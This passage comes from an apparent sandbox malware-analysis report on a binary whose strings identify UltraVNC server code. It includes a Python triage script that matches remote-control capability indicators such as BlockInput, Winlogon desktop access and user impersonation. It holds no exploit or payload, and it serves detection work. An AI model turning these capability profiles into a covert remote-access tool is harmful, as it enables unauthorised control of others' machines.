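• API String ID: 524771730-2664985301
• Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
Similarity
• API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
• String ID: F
• API String ID: 2411647221-1304234792
• Opcode ID: cc642ca3bff3ad97ef2125c9e7fe796bc43ee1a04bd7d1332a209876cd4ebe06
"""

# The report joins list-valued fields with '$'; the other IDs are scalars.
LIST_FIELDS = ("API ID", "String ID")
ID_LINE = re.compile(
    r"^\s*•?\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID):\s?(.*)$"
)

# (substring of a String ID entry, capability it evidences): assumption,
# every needle is a string that occurs in this report.
INDICATORS = [
    ("winsta.dll", "winsta.dll terminal-session API"),
    ("WinStationConnectW", "session connect (WinStationConnectW)"),
    ("WinStationQueryInformationW", "session query (WinStationQueryInformationW)"),
    ("Winsta0\\Winlogon", "opens the Winlogon desktop"),
    ("LockWorkStation", "can lock the workstation"),
    ("SystemExecSrvr", "uses the TerminalServer SystemExecSrvr pipe"),
    ("mv2.dll", "mirror video driver (mv2.dll)"),
    ("CreatePluginInterface", "DSM plugin interface"),
    ("vncdesktopsink.cpp", "desktop hook install/uninstall (vncdesktopsink.cpp)"),
    ("BlockInput", "can block local keyboard/mouse input"),
]


def parse_records(text):
    """Return one dict per 'Similarity' record; list fields are split on '$'."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            cur = {}
            records.append(cur)
            continue
        m = ID_LINE.match(line)
        if m and cur is not None:
            key, value = m.group(1), m.group(2)
            if key in LIST_FIELDS:
                cur[key] = [t for t in value.split("$") if t]
            else:
                cur[key] = value.strip()
    return records


def capabilities(record):
    """Set of capability labels evidenced by the record's String ID list."""
    found = set()
    for s in record.get("String ID", []):
        for needle, label in INDICATORS:
            if needle in s:
                found.add(label)
    return found


def resolves_apis_dynamically(record):
    """Heuristic (assumption): API ID groups concatenate API-name words, so a
    group holding both 'Address' and 'Proc' alongside a 'Library' group points
    at GetProcAddress + LoadLibrary, i.e. run-time import resolution."""
    groups = record.get("API ID", [])
    has_library = any("Library" in g for g in groups)
    has_procaddr = any("Address" in g and "Proc" in g for g in groups)
    return has_library and has_procaddr


def triage(text):
    """Map each record's Opcode ID prefix to its capability summary."""
    out = {}
    for rec in parse_records(text):
        out[rec.get("Opcode ID", "?")[:12]] = {
            "dynamic_api_resolution": resolves_apis_dynamically(rec),
            "capabilities": sorted(capabilities(rec)),
        }
    return out


if __name__ == "__main__":
    for opcode, summary in triage(SAMPLE).items():
        print(opcode, summary)
```

The summary describes capability, not intent: these strings belong to the UltraVNC server code itself (the report's own strings name winvnc and vncdesktopsink.cpp), so the same profile appears in a legitimately installed server. What distinguishes this sample is the rest of the report (where the binary was dropped from, what icon it carries, how it was started), not the capability set alone.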
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
• String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
• API String ID: 524771730-2664985301
• Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
• Instruction ID: f9619f36da08bdb6b80cbe2701b88bda98dbe11986ece36b6cc3b41f816eb4c8
• Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
• Instruction Fuzzy Hash: 55D10A25A09B8695E794CF25A98427937B0FB09769F404236DFACD37A0DFBCE529C700
APIs
Strings
Yara matches
Similarity
• API ID: CreateDescriptorSecurity$EventFile$MappingSaclView$ConvertDaclErrorInitializeLastString
• String ID: Global\$S:(ML;;NW;;;LW)$event_IN$event_IN_DONE$event_OUT$event_OUT_DONE$fm_IN$fm_OUT
• API String ID: 1989023930-362996323
• Opcode ID: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
• Instruction ID: ede89c90a4c309b74a3bc1113793412a710e8c80efd37bd549fb85153946bd51
• Opcode Fuzzy Hash: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
• Instruction Fuzzy Hash: 8EB17D62608B8292EA94DF60E4917EA33B0FB89759F804131DF9D83B95DF7CE529C740
APIs
Yara matches
Similarity
• API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
• String ID:
• API String ID: 1939172783-0
• Opcode ID: 92b57b9060b2f9a1b4901c51a30021d196aa55e373a880418b56e66cb62c40a1
• Instruction ID: d43513098efebae7504b233e3b0e021c3268a0066f2801580d22a469b9876599
• Opcode Fuzzy Hash: 92b57b9060b2f9a1b4901c51a30021d196aa55e373a880418b56e66cb62c40a1
• Instruction Fuzzy Hash: C7815B21A09B4286E694EF16A91027973B0FF45B8AB044135DF9EC7791EF7CF424D700
APIs
Strings
• HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF6C2B8AA4D
• HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF6C2B8AAE1
• HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6C2B8AB3F
• HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF6C2B8A94D
• HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF6C2B8AA26
• HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF6C2B8A9BB
• HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF6C2B8AAC1
• HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF6C2B8AB1D
• HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF6C2B8A9E6
• HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6C2B8A97B
Yara matches
Similarity
• API ID: ErrorInfoLastParametersSystem
• String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
• API String ID: 2777246624-1480653996
• Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
• Instruction ID: f57359a591fc3cbb863e31cf6bb55788ed018a6b5eb91bbfa5d477f34e36bcfa
• Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
• Instruction Fuzzy Hash: EC513C64E0C68785F7909FA5A940BB527A1AF6530EF805032CECDD37A1EEFCA549C391
APIs
Strings
• vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF6C2BAC2F4
• vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF6C2BAC37E
• g, xrefs: 00007FF6C2BAC31B
• vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF6C2BAC3DC
• vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF6C2BAC43D
• vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF6C2BAC455
• vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF6C2BAC3A7
Yara matches
Similarity
• API ID: CriticalSection$Leave$Enter
• String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
• API String ID: 2978645861-1267036565
• Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
• Instruction ID: e7bd779577f37a77931b7394a8d887ec02b83100e6c24e52415643a2a7e4af6d
• Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
• Instruction Fuzzy Hash: 1D513025A1C68285E790DF61A8546F933A1EF8AB9EF484032DECEC2391DFBDE405C744
APIs
Strings
Yara matches
Similarity
• API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
• String ID: \$vncclient.cpp : FATAL! client update region is empty!
• API String ID: 1264956880-3227535004
• Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
• Instruction ID: 12a2556e38a8bd4cdced344d67920a16d4d4a4818d3b3e4c68a401aeee41633f
• Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
• Instruction Fuzzy Hash: B3A1E7326546968AD780DF16E844AAA77B8FB89B89F415036EF8E83750CF7DD805CB40
APIs
Strings
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (IA64 Processor)$Current user :
• API String ID: 171970310-1812746349
• Opcode ID: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
• Instruction ID: 76667b028b553d64a846b4cf2961bfb1346de6dc999213fb65b54cf5ce937e95
• Opcode Fuzzy Hash: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
• Instruction Fuzzy Hash: 55B1AF65A0868295EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE515C310
APIs
Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
                                                                            • API String ID: 171970310-1760265636
                                                                            • Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                            • Instruction ID: 5e48bb2aa312199908231e958fec24a5dd07a6f60461c23f29ce23253cfe2c0b
                                                                            • Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                            • Instruction Fuzzy Hash: 42B1AE25A0868295EBA0CF3598402B937A0FB057BDF504336EABEC7BD5DEACE515C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
• API String ID: 171970310-1756215141
• Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
• Instruction ID: 46aa7f25780b9003d7ff6d42d6eea2070a3cfb9b028b1b070b75a3f6bc30d731
• Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
• Instruction Fuzzy Hash: 7DB1BF65A08A8285EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE515C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
• API String ID: 171970310-18614430
• Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
• Instruction ID: 1ef005e9bbcbfc67bfcd2763b6cf5a7fb40b24858f2725e00c5c846b54de132c
• Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
• Instruction Fuzzy Hash: A1B1AF25A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE515C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (AMD64 Processor)$Current user :
• API String ID: 171970310-4243357635
• Opcode ID: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
• Instruction ID: 64282d007832174a361abc292610b4d8bc216dbe6cebe76e82727b8b5f161ba5
• Opcode Fuzzy Hash: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
• Instruction Fuzzy Hash: 7EB1BF25A08A8285EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (PPC Processor)$Current user :
• API String ID: 171970310-3099718995
• Opcode ID: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
• Instruction ID: abfb3f56892e6c167dde92896338b7a26d77d44b3086769fd7e4303351643a0b
• Opcode Fuzzy Hash: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
• Instruction Fuzzy Hash: BDB1AF25A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
• API String ID: 171970310-3029765189
• Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
• Instruction ID: d0cb3a5a1240efa9525e1b64f06d474e90ba563ade590b4fd1695cb7739baa21
• Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
• Instruction Fuzzy Hash: 61B1AF65A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
• API String ID: 171970310-733379141
• Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
• Instruction ID: 1295946154649eb3a0247bded5c5c2deac22c790aaff24982b9788813e2db80e
• Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
• Instruction Fuzzy Hash: E0B1AF65A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
• API String ID: 171970310-3227166451
• Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
• Instruction ID: f8028994a7bf0b28b922261340387a71a4ded54c7d38b655e7364a58f8266f65
• Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
• Instruction Fuzzy Hash: 06B1AF25A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
• API String ID: 171970310-978419383
• Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
• Instruction ID: 793ee3a5df88236d59de648bc7d548b0d448531879e7dff5f47ea9f56fcec496
• Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
• Instruction Fuzzy Hash: 2FB1AF25A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
